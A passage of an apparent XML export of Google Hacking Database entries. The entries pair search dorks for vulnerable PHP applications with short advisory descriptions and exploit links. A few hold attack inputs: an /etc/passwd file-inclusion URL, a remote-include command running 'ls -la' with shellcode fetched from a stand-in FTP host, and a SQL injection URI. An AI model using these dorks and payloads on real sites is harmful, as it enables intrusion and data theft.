<edb>https://www.exploit-db.com/exploits/4897</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3459</id>
<link>https://www.exploit-db.com/ghdb/3459</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Advanced Transfer Manager v1.30&quot;</shortDescription>
<textualDescription>PHP Advanced Transfer Manager 1.30 Source Code Disclosure: https://www.exploit-db.com/exploits/2968</textualDescription>
<query>&quot;Powered by PHP Advanced Transfer Manager v1.30&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22</querystring>
<edb>https://www.exploit-db.com/exploits/2968</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1117</id>
<link>https://www.exploit-db.com/ghdb/1117</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Advanced Transfer Manager&quot;</shortDescription>
<textualDescription>PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it</textualDescription>
<query>&quot;Powered by PHP Advanced Transfer Manager v1.30&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22</querystring>
<edb></edb>
<date>2005-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>2129</id>
<link>https://www.exploit-db.com/ghdb/2129</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by php advanced transfer manager&quot;</shortDescription>
<textualDescription>phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: https://www.exploit-db.com/exploits/3918</textualDescription>
<query>&quot;powered by php advanced transfer manager&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+php+advanced+transfer+manager%22</querystring>
<edb>https://www.exploit-db.com/exploits/3918</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3381</id>
<link>https://www.exploit-db.com/ghdb/3381</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Director 0.2&quot;</shortDescription>
<textualDescription>PHP Director 0.21 (sql into outfile) eval() Injection: https://www.exploit-db.com/exploits/8181</textualDescription>
<query>&quot;Powered by PHP Director 0.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Director+0.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/8181</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3058</id>
<link>https://www.exploit-db.com/ghdb/3058</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Director&quot;</shortDescription>
<textualDescription>PHPDirector</textualDescription>
<query>&quot;Powered by PHP Director&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Director%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3446</id>
<link>https://www.exploit-db.com/ghdb/3446</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP iCalendar&quot;</shortDescription>
<textualDescription>PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: https://www.exploit-db.com/exploits/6519</textualDescription>
<query>&quot;Powered by PHP iCalendar&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+iCalendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/6519</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1316</id>
<link>https://www.exploit-db.com/ghdb/1316</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by php icalendar&quot; -ihackstuff -exploit</shortDescription>
<textualDescription>this is for php iCalendar</textualDescription>
<query>&quot;powered by php icalendar&quot; -ihackstuff -exploit</query>
<querystring>https://www.google.com/search?q=%22powered+by+php+icalendar%22+-ihackstuff+-exploit&amp;num=100&amp;start=100&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3321</id>
<link>https://www.exploit-db.com/ghdb/3321</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Live! v3.3&quot;</shortDescription>
<textualDescription>PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: https://www.exploit-db.com/exploits/9578</textualDescription>
<query>&quot;Powered by PHP Live! v3.3&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Live!+v3.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/9578</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3517</id>
<link>https://www.exploit-db.com/ghdb/3517</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Photo Album&quot;</shortDescription>
<textualDescription>phpAlbum</textualDescription>
<query>&quot;Powered by PHP Photo Album&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Photo+Album%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3520</id>
<link>https://www.exploit-db.com/ghdb/3520</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by php photo album&quot; -demo2 -pitanje&quot;</shortDescription>
<textualDescription>PHP Album 0.3.2.3 Remote Command Execution: https://www.exploit-db.com/exploits/1678</textualDescription>
<query>&quot;powered by php photo album&quot; -demo2 -pitanje&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+php+photo+album%22+-demo2+-pitanje%22</querystring>
<edb>https://www.exploit-db.com/exploits/1678</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1333</id>
<link>https://www.exploit-db.com/ghdb/1333</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by php photo album&quot; | inurl:&quot;main.php?cmd=album&quot; -demo2 -pitanje</shortDescription>
<textualDescription>dork: &quot;powered by php photo album&quot; | inurl:&quot;main.php?cmd=album&quot; -demo2 -pitanje poc: if register_globals = On &amp; magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&amp;data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526</textualDescription>
<query>&quot;powered by php photo album&quot; | inurl:&quot;main.php?cmd=album&quot; -demo2 -pitanje</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+php+photo+album%22+%7C+inurl%3A%22main.php%3Fcmd%3Dalbum%22+-demo2+-pitanje+&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1898</id>
<link>https://www.exploit-db.com/ghdb/1898</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP Shop from DeltaScripts&quot;</shortDescription>
<textualDescription>DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: https://www.exploit-db.com/exploits/7025</textualDescription>
<query>&quot;Powered by PHP Shop from DeltaScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP+Shop+from+DeltaScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/7025</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3487</id>
<link>https://www.exploit-db.com/ghdb/3487</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by php update&quot;</shortDescription>
<textualDescription>PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: https://www.exploit-db.com/exploits/3020</textualDescription>
<query>&quot;powered by php update&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+php+update%22</querystring>
<edb>https://www.exploit-db.com/exploits/3020</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1381</id>
<link>https://www.exploit-db.com/ghdb/1381</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP-Fusion v6.00.110&quot; | &quot;Powered by PHP-Fusion v6.00.2..&quot; | &quot;Powered by PHP-Fusion v6.00.3..&quot; -v6.00.400 -johnny.ihackstuff</shortDescription>
<textualDescription>this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html</textualDescription>
<query>&quot;Powered by PHP-Fusion v6.00.110&quot; | &quot;Powered by PHP-Fusion v6.00.2..&quot; | &quot;Powered by PHP-Fusion v6.00.3..&quot; -v6.00.400 -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP-Fusion+v6.00.110%22+%7C+%22Powered+by+PHP-Fusion+v6.00.2..%22+%7C+%22Powered+by+PHP-Fusion+v6.00.3..%22+-v6.00.400+-johnny.ihackstuff&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3478</id>
<link>https://www.exploit-db.com/ghdb/3478</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP-Update&quot; -site:www.php-update.co.uk</shortDescription>
<textualDescription>PHP-Update</textualDescription>
<query>&quot;Powered by PHP-Update&quot; -site:www.php-update.co.uk</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP-Update%22+-site:www.php-update.co.uk</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3549</id>
<link>https://www.exploit-db.com/ghdb/3549</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHP-Update&quot; -site:www.php-update.co.uk</shortDescription>
<textualDescription>PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879:
https://www.exploit-db.com/exploits/3017</textualDescription>
<query>&quot;Powered by PHP-Update&quot; -site:www.php-update.co.uk</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHP-Update%22+-site:www.php-update.co.uk</querystring>
<edb>https://www.exploit-db.com/exploits/3017</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1752</id>
<link>https://www.exploit-db.com/ghdb/1752</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by phpAdBoard&quot;</shortDescription>
<textualDescription>phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 2008-6921: https://www.exploit-db.com/exploits/7562</textualDescription>
<query>&quot;powered by phpAdBoard&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+phpAdBoard%22</querystring>
<edb>https://www.exploit-db.com/exploits/7562</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5897</id>
<link>https://www.exploit-db.com/ghdb/5897</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHPBack&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by PHPBack&quot;
# By using this dork, sites &quot;Powered by PHPBack&quot; can be found. PHPBack
v1.3.0 is vulnerable to Boolean blind and error based SQL Injection in the
'orderby' parameter. By sending SQL Injection query using MySQL XPATH
function ExtractValue() we can grab information from the errors generated.
This dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/39711
# Date: 07/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by PHPBack&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by PHPBack&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2871</id>
<link>https://www.exploit-db.com/ghdb/2871</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHPBasket&quot;</shortDescription>
<textualDescription>PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: https://www.exploit-db.com/exploits/6258</textualDescription>
<query>&quot;Powered by PHPBasket&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHPBasket%22</querystring>
<edb>https://www.exploit-db.com/exploits/6258</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1030</id>
<link>https://www.exploit-db.com/ghdb/1030</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by PhpBB 2.0.15&quot; -site:phpbb.com</shortDescription>
<textualDescription>Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name.</textualDescription>
<query>&quot;powered by PhpBB 2.0.15&quot; -site:phpbb.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22powered+by+PhpBB+2.0.15%22+-site%3Aphpbb.com</querystring>
<edb></edb>
<date>2005-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1744</id>
<link>https://www.exploit-db.com/ghdb/1744</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By phpBB Garage 1.2.0&quot;</shortDescription>
<textualDescription>phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 2007-6223: https://www.exploit-db.com/exploits/4686</textualDescription>
<query>&quot;Powered By phpBB Garage 1.2.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+phpBB+Garage+1.2.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/4686</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3137</id>
<link>https://www.exploit-db.com/ghdb/3137</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by phpCC Beta 4.2&quot;</shortDescription>
<textualDescription>phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: https://www.exploit-db.com/exploits/2134</textualDescription>
<query>&quot;Powered by phpCC Beta 4.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+phpCC+Beta+4.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/2134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1218</id>
<link>https://www.exploit-db.com/ghdb/1218</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By phpCOIN 1.2.2&quot;</shortDescription>
<textualDescription>PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:&quot;Powered By phpCOIN&quot;to see previous verions (not tested)</textualDescription>
<query>&quot;Powered By phpCOIN 1.2.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+phpCOIN+1.2.2%22</querystring>
<edb></edb>
<date>2005-12-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>2799</id>
<link>https://www.exploit-db.com/ghdb/2799</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By phpCOIN v1.2.1&quot; / &quot;mod.php?mod=faq&quot;</shortDescription>
<textualDescription>phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: https://www.exploit-db.com/exploits/11641</textualDescription>
<query>&quot;Powered By phpCOIN v1.2.1&quot; / &quot;mod.php?mod=faq&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+phpCOIN+v1.2.1%22+/+%22mod.php%3Fmod%3Dfaq%22</querystring>
<edb>https://www.exploit-db.com/exploits/11641</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1648</id>
<link>https://www.exploit-db.com/ghdb/1648</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by phpEmployment&quot;</shortDescription>
<textualDescription>phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: https://www.exploit-db.com/exploits/7563</textualDescription>
<query>&quot;powered by phpEmployment&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+phpEmployment%22</querystring>
<edb>https://www.exploit-db.com/exploits/7563</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2117</id>
<link>https://www.exploit-db.com/ghdb/2117</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by phpGreetCards&quot;</shortDescription>
<textualDescription>phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: https://www.exploit-db.com/exploits/7561</textualDescription>
<query>&quot;powered by phpGreetCards&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+phpGreetCards%22</querystring>
<edb>https://www.exploit-db.com/exploits/7561</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3106</id>
<link>https://www.exploit-db.com/ghdb/3106</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PHPizabi v0.848b C1 HFP1&quot;</shortDescription>
<textualDescription>PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: https://www.exploit-db.com/exploits/5136</textualDescription>
<query>&quot;Powered by PHPizabi v0.848b C1 HFP1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PHPizabi+v0.848b+C1+HFP1%22</querystring>
<edb>https://www.exploit-db.com/exploits/5136</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1328</id>
<link>https://www.exploit-db.com/ghdb/1328</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by phplist&quot; | inurl:&quot;lists/?p=subscribe&quot; | inurl:&quot;lists/index.php?p=subscribe&quot; -ubbi -bugs +phplist -tincan.co.uk</shortDescription>
<textualDescription>this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html</textualDescription>
<query>&quot;powered by phplist&quot; | inurl:&quot;lists/?p=subscribe&quot; | inurl:&quot;lists/index.php?p=subscribe&quot; -ubbi -bugs +phplist -tincan.co.uk</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+phplist%22+%7C+inurl%3A%22lists%2F%3Fp%3Dsubscribe%22+%7C+inurl%3A%22lists%2Findex.php%3Fp%3Dsubscribe%22+-ubbi+-bugs+%2Bphplist+-tincan.co.uk</querystring>
<edb></edb>
<date>2006-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1653</id>
<link>https://www.exploit-db.com/ghdb/1653</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by phpmydirectory&quot; OR intext:&quot;2001-2006 phpMyDirectory.com&quot;</shortDescription>
<textualDescription>phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: https://www.exploit-db.com/exploits/1808</textualDescription>
<query>&quot;powered by phpmydirectory&quot; OR intext:&quot;2001-2006 phpMyDirectory.com&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+phpmydirectory%22+OR+intext:%222001-2006+phpMyDirectory.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/1808</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3666</id>
<link>https://www.exploit-db.com/ghdb/3666</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by phpMySport&quot;</shortDescription>
<textualDescription>intext:&quot;Powered by phpMySport&quot; Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15921/</textualDescription>
<query>&quot;Powered by phpMySport&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22POWERED%20BY%20phpMySport%22</querystring>
<edb>https://www.exploit-db.com/exploits/15921</edb>
<date>2011-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3433</id>
<link>https://www.exploit-db.com/ghdb/3433</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;POWERED BY PHPNUKE.IR&quot;</shortDescription>
<textualDescription>PHPnuke 8.2 Remote Upload File: https://www.exploit-db.com/exploits/14058</textualDescription>
<query>&quot;POWERED BY PHPNUKE.IR&quot;</query>
<querystring>https://www.google.com/search?q=%22POWERED+BY+PHPNUKE.IR%22</querystring>
<edb>https://www.exploit-db.com/exploits/14058</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3427</id>
<link>https://www.exploit-db.com/ghdb/3427</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Pligg&quot; + &quot;Legal: License and Source&quot;</shortDescription>
<textualDescription>Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: https://www.exploit-db.com/exploits/6172</textualDescription>
<query>&quot;Powered By Pligg&quot; + &quot;Legal: License and Source&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Pligg%22+%2B+%22Legal:+License+and+Source%22</querystring>
<edb>https://www.exploit-db.com/exploits/6172</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3426</id>
<link>https://www.exploit-db.com/ghdb/3426</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PMOS Help Desk&quot;</shortDescription>
<textualDescription>PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: https://www.exploit-db.com/exploits/4789</textualDescription>
<query>&quot;Powered by PMOS Help Desk&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PMOS+Help+Desk%22</querystring>
<edb>https://www.exploit-db.com/exploits/4789</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5871</id>
<link>https://www.exploit-db.com/ghdb/5871</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Podcast Generator&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by Podcast Generator&quot;
# By using this dork, sites &quot;Powered by Podcast Generator&quot; can be found.
The vulnerability exists due to failure in the &quot;/core/episode.php&quot; script
to properly sanitize user-supplied input in &quot;name&quot; variable, it's possible
to generate an error that will reveal the full path of the script. A remote
user can determine the full path to the web root directory and other
potentially sensitive information. This dork is linked to the following
existing exploit: https://www.exploit-db.com/exploits/16109
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by Podcast Generator&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Podcast Generator&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1965</id>
<link>https://www.exploit-db.com/ghdb/1965</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Populum&quot;</shortDescription>
<textualDescription>Populum 2.3 SQL injection vulnerability: https://www.exploit-db.com/exploits/11126</textualDescription>
<query>&quot;Powered by Populum&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Populum%22</querystring>
<edb>https://www.exploit-db.com/exploits/11126</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>697</id>
<link>https://www.exploit-db.com/ghdb/697</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PowerPortal v1.3&quot;</shortDescription>
<textualDescription>PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681</textualDescription>
<query>&quot;Powered by PowerPortal v1.3&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Powered+by+PowerPortal+v1.3%22</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1380</id>
<link>https://www.exploit-db.com/ghdb/1380</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by pppblog v 0.3.(.)&quot;</shortDescription>
<textualDescription>this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html</textualDescription>
<query>&quot;powered by pppblog v 0.3.(.)&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+pppblog+v+0.3.(.)%22&amp;num=100&amp;start=200&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3224</id>
<link>https://www.exploit-db.com/ghdb/3224</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ProjectCMS&quot; </shortDescription>
<textualDescription>ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: https://www.exploit-db.com/exploits/8565</textualDescription>
<query>&quot;Powered by ProjectCMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ProjectCMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/8565</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3331</id>
<link>https://www.exploit-db.com/ghdb/3331</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ProjectCMS&quot; </shortDescription>
<textualDescription>ProjectCMS 1.1b Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8608</textualDescription>
<query>&quot;Powered by ProjectCMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ProjectCMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/8608</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2093</id>
<link>https://www.exploit-db.com/ghdb/2093</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PsNews&quot;</shortDescription>
<textualDescription>PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: https://www.exploit-db.com/exploits/4174</textualDescription>
<query>&quot;Powered by PsNews&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PsNews%22</querystring>
<edb>https://www.exploit-db.com/exploits/4174</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3332</id>
<link>https://www.exploit-db.com/ghdb/3332</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PunBB&quot;</shortDescription>
<textualDescription>PunBB Extension Attachment 1.0.2 SQL Injection: https://www.exploit-db.com/exploits/9849</textualDescription>
<query>&quot;Powered by PunBB&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PunBB%22</querystring>
<edb>https://www.exploit-db.com/exploits/9849</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1967</id>
<link>https://www.exploit-db.com/ghdb/1967</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PWP Version 1-5-1&quot; AND inurl:&quot;/wiki/run.php&quot;</shortDescription>
<textualDescription>PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7740</textualDescription>
<query>&quot;Powered by PWP Version 1-5-1&quot; AND inurl:&quot;/wiki/run.php&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PWP+Version+1-5-1%22+AND+inurl:%22/wiki/run.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/7740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3546</id>
<link>https://www.exploit-db.com/ghdb/3546</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Quick.Cart&quot;</shortDescription>
<textualDescription>Quick.Cart 2.0 (actions_client/gallery.php) Local File Include:
https://www.exploit-db.com/exploits/2769</textualDescription>
<query>&quot;powered by Quick.Cart&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Quick.Cart%22</querystring>
<edb>https://www.exploit-db.com/exploits/2769</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3598</id>
<link>https://www.exploit-db.com/ghdb/3598</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Quick.Cart&quot;</shortDescription>
<textualDescription>Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138: https://www.exploit-db.com/exploits/4025</textualDescription>
<query>&quot;Powered by Quick.Cart&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Quick.Cart%22</querystring>
<edb>https://www.exploit-db.com/exploits/4025</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1753</id>
<link>https://www.exploit-db.com/ghdb/1753</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Quick.Cms&quot;</shortDescription>
<textualDescription>Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: https://www.exploit-db.com/exploits/8505</textualDescription>
<query>&quot;Powered by Quick.Cms&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Quick.Cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/8505</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3534</id>
<link>https://www.exploit-db.com/ghdb/3534</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Quick.Cms&quot;</shortDescription>
<textualDescription>Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: https://www.exploit-db.com/exploits/2719</textualDescription>
<query>&quot;Powered by Quick.Cms&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Quick.Cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/2719</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2647</id>
<link>https://www.exploit-db.com/ghdb/2647</link>
<category>Advisories and Vulnerabilities</category>
